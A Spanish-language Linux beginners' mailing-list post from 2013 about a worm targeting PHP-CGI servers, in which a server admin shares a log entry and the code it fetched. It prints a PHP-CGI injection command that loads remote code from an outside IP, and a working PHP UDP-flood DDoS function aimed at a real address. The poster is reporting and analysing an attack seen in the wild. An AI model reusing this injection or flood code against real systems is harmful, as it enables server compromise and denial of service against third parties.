[Lugro-principiantes] Nuevo gusano que afecta GNU/Linux

Mie Dic 4 10:36:36 ART 2013

El 03/12/13 23:50, Martín Carr escribió:
> 2013/12/3, E S<micta2003 en yahoo.com>:
>> Estimados
>>
>> No me queda claro como me puede afectar este gusano. Tengo LinuxMint 15 y
>> soy un usuario comun. Esas recomendaciones son para redes?
>
> Salvo que uses tu computadora como un servidor web (para alojar
> páginas dinámicas que usan el lenguaje PHP) y no la hayas actualizado,
> no tenés que preocuparte.
>
> Saludos!
>
No se si sera esto, pero encontre en mi servidor este log:
/usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d 
suhosin.simulation=on -d disable_functions=\"\" -d open_basedir=none -d 
auto_prepend_file=http://82.221.102.181/robots.txt -d 
cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

Como que esta intentando descargar un archivo robots.txt desde un 
servidor... al mirar este archivo encontre este codigo:

<?php

function ddos($host, $exec_time){
     $packets = 0;
     ignore_user_abort(TRUE);
     set_time_limit(0);
     $out = '';
     $time = time();
     echo "Started: ".time('d-m-y h:i:s')."<br>";
     $max_time = $time+$exec_time;

     for($i=0;$i<65000;$i++){
             $out .= 'h';
     }
     while(1){
     $packets++;
             if(time() > $max_time){
                     break;
             }
             $rand = rand(1,65000);
             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
             if($fp){
                     @fwrite($fp, $out); // $out is the bullshit we're 
sending, conn refused errors still send the data
                     fclose($fp);
             }
     }
}
ddos("199.107.6.164","60");

No se quien sera el pobre 199.107.6.164 pero me parece que se la tienen 
jurada....
Saludos
Ernesto